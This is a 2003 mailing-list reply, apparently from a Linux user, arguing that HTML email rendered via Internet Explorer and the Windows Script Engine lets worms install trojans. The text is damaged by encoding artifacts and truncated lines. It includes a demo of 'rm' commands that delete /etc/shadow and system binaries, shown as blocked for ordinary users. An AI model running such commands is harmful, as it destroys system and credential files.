Email Clients and digital signatures
Sat Jul 5 20:47:02 2003
Content-Description: signed data
On Saturday 05 Jul 2003 5:45 pm, CL Gilbert wrote:
> I don't comprehend this. A script is not allowed to run local programs.
Of course it is allowed - the default action is to allow execution of any=20
But VBScript/ActiveX is involved and therefore so is the system registry, t=
main windows API and through that the CPU. Windows scripting worms are=20
capable of downloading malicious code completely without intervention:
(other than allowing HTML emails to be viewed as HTML).
This works because HTML emails are rendered using IE and therefore the usua=
IE vulnerabilities are added to the mail client. So by constructing a=20
deliberate page that automatically loads the code, then constructing a=20
matching email worm to load that URL in the email preview, the trojan can b=
installed. As noted in the quote below, the malicious web page could simply=
be emailed directly, cutting out one step but still exposing the true=20
vulnerability: IE and it's propensity to help malicious HTML email.
The Windows Script Engine provides Windows operating systems with the abili=
to execute script code. Script code can be used to add functionality to web=
pages, or to automate tasks within the operating system or within a program=
Script code can be written in several different scripting languages, such a=
Visual Basic Script, or JScript.=20
A flaw exists in the way by which the Windows Script Engine for JScript=20
processes information. An attacker could exploit the vulnerability by=20
constructing a web page that, when visited by the user, would execute code =
the attacker's choice with the user's privileges. The web page could be=20
hosted on a web site, or sent directly to the user in email.
It has already been done, email worms are currently out there that can and=
have performed exactly these operations. (Not always with the niceity of=20
obeying the user's privileges - which are weakly enforced at best.)
The people who write these mailicious pages and scripts are not short of ti=
intent or ability. You might think it isn't worth it, but there are plenty =
people who see it as extremely entertaining.
There are tips available to bolster Windows poor security, including on my =
> ~ And certainly NOT automatically. Anything you start on your own is
Not true. Automation is easy. Automation IS THE DEFAULT ACTION! The Windows=
Scripting Engine is always loaded within Windows (Win95/98 allowed=20
uninstallation, later versions try to reinstall at reboot) and is always=20
ready to execute ANY active code that is passed along. IE will, by default,=
ALWAYS pass on ALL active code to WSE. This is ostensibly because IE and=20
Explorer are meant to operate together and this is the source of the=20
problems. Explorer is meant to operate WSE and run local macros, automate=20
desktop tasks, load programs silently, etc. Netscape doesn't have these=20
vulnerabilities because it isn't part of Explorer. IE cannot easily avoid=20
calling WSE. If it did, Outlook would not become vulnerable in turn.
The core problem is that Windows treats all users as the system administrat=
and assumes that all users have the authority to e.g. format the C: drive.=
Unix/Linux realise that not all users can be trusted not to do this - least=
all automated tasks running in what should be the 'user' environment. When=
running Linux as an ordinary user (99.9999% of the time), I cannot delete=20
anything except what is in my own user space. I cannot overwrite system=20
files, I cannot amend or add to system settings. I cannot run programs that=
have the authority to change any of these things.=20
A simple example. From the command line (DOS), type:
What, you can delete all three? In Unix/Linux you get:
$ rm /etc/shadow
$ rm /usr/bin/gcc-3.2.2
$ rm /usr/bin/mozilla
Any program I execute in Windows runs with full privileges. Any program I=20
execute in Linux runs only as a user. (And before you mention Windows user=
logins and user passwords, there are known ways around these too.)
> your own fault. The only scripting I am aware of that is allowed is
> page. like i said, its in a sandbox. the worse trick people have been
Not true. The sandbox doesn't exist - it was never even conceived. Windows3=
the basis of the system and was never intended to be opened up to the outsi=
world. The sandbox was to be the entire PC, but by the time MS grudgingly=20
admitted that users actually wanted the internet, the box was already looki=
like swiss cheese.
> |>~ Outlook is not supposed to automatically *run* arbitrary scripts. Wh=
> |>it does, thats an error.
> still disagree. that has nothing to do with outlook, and Linux even has
> a fileroler or something that can start programs based on extensions.
Within the user space, not within the system space. Plus all Linux clients=
DEFAULT to not running these extensions and provide warnings that doing so=
could compromise system security.
The program you are thinking of depends on which environment the user choos=
Nautilus in Gnome or Konqueror in KDE. Neither executes arbitrary code on a=
web page or in HTML email within the local environment.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
-----END PGP SIGNATURE-----